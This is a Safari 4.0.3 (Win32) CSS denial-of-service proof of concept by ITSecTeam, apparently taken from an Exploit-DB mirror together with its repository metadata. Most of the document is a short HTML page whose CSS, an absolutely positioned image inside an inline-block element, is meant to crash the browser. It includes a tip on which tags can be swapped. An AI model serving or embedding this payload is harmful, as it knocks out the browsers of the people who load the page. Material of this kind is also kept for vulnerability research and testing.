exploit-db-mirror/exploits/windows_x86/dos/12457.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

34 lines
No EOL
1,011 B
Text

===============================================================
Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit
===============================================================
################## In The Name Of Allah ########################
#Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit
#Tested on Safari 4.0.3.0 (4.531.9.1)
#vendor : http://www.apple.com/safari
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Original Advisory:
#http://www.itsecteam.com/en/vulnerabilities/vulnerability49.htm
#Special Thanks: b3hz4d,M3hr@n.s,Cdef3nder,PLATEN
################################################################
<html dir="rtl">
<body>
<style type="text/css">
.crash {
position:relative;
padding: 4px 6px;
display:inline-block;
}
.crash img {
position:absolute;
}
</style>
<div class="crash">
<P><img></p> you can replace <p> tags with any other tags, but you
shouldnt change <img> tag
</div>
</body>
</html>